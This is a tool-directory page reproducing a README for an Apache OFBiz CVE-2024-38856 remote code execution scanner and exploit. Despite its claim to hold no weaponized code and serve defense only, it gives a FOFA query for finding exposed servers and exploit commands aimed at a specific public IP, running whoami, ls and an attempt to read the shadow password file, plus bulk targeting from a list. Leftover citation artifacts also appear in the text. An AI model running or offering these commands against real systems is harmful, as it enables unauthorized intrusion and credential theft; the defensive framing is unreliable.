Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-38856-Apache-OFBiz — CVE-2024-38856: Apache OFBiz remote code execution Scanner & Exploit | Kitploit
Tools/GitHubGitHub/hex00-0x4/cve-2024-38856-apache-ofbiz
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubhex00-0x4/cve-2024-38856-apache-ofbiz

CVE-2024-38856-Apache-OFBiz

CVE-2024-38856: Apache OFBiz remote code execution Scanner & Exploit

View Repository
3311 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-38856 — Apache OFBiz (Repository documentation)

Repository purpose: informational documentation about CVE-2024-38856 (Apache OFBiz incorrect-authorization / pre-auth RCE).
This repository does not contain weaponized exploit code. It is intended for defensive research, patching guidance, detection, and safe lab testing only.


Overview

CVE-2024-38856 is an incorrect-authorization vulnerability in Apache OFBiz that may allow unauthenticated access to certain endpoints and, under specific conditions, enable execution of screen rendering code which can lead to remote code execution on affected systems. The issue was fixed in Apache OFBiz 18.12.15; earlier releases up to 18.12.14 are affected. :contentReference[oaicite:0]{index=0}

Severity / Impact: multiple security vendors and researchers rated this vulnerability as critical — it can lead to unauthenticated remote code execution on vulnerable instances, and has been observed in active exploitation attempts in the wild. Administrators should treat exposed OFBiz instances as high-priority remediation items. :contentReference[oaicite:1]{index=1}


Affected versions

  • Apache OFBiz: through 18.12.14 (i.e., all releases <= 18.12.14 are considered vulnerable). The issue was addressed in 18.12.15. Upgrade is recommended. :contentReference[oaicite:2]{index=2}

fofa : app="Apache_OFBiz" && port="8443"
Screenshot 2025-10-10 183057

Exploit:

git clone https://github.com/Hex00-0x4/CVE-2024-38856-Apache-OFBiz.git

cd CVE-2024-38856-Apache-OFBiz

└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "whoami"

└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ifconfig"

└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ls"

└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "cat /etc/shodow"

Screenshot 2025-10-10 184101

─$ python3 apache_bang.py --file target.txt -c "ls"

Screenshot 2025-10-10 075018
Download Tool